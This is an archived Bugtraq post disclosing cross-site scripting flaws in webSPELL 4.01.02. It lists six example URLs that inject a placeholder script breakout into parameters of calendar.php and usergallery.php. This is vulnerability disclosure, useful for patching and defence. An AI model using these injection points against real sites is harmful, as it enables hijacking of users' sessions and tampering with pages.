Bugtraq mailing list archives

Previous By Date Next
Previous By Thread Next

webSPELL 4.01.02 (calendar.php, usergallery.php) XSS Vulnerability

From: brainheadbrainhead () gmx de
Date: 8 Dec 2007 22:53:59 -0000
###################
Autor: Brainhead                                                        
Type: XSS                                                   
Version:  4.01.02                               
Files: usergallery.php, calendar.php                        
Magic Quotes :off                                         
###################
Examples:

http://site.tld/[PATH]/index.php?site=usergallery&action=upload&galleryID=";>[your code]
http://site.tld/[PATH]/index.php?site=calendar&action=announce&upID=";>[your code]
http://site.tld/[PATH]/index.php?site=calendar&action=announce&tag=";>[your code]
http://site.tld/[PATH]/index.php?site=calendar&action=announce&month=";>[your code]
http://site.tld/[PATH]/index.php?site=calendar&action=announce&userID=";>[your code]
http://site.tld/[PATH]/index.php?site=calendar&action=announce&year=";>[your code]
Previous By Date Next
Previous By Thread Next

Current thread: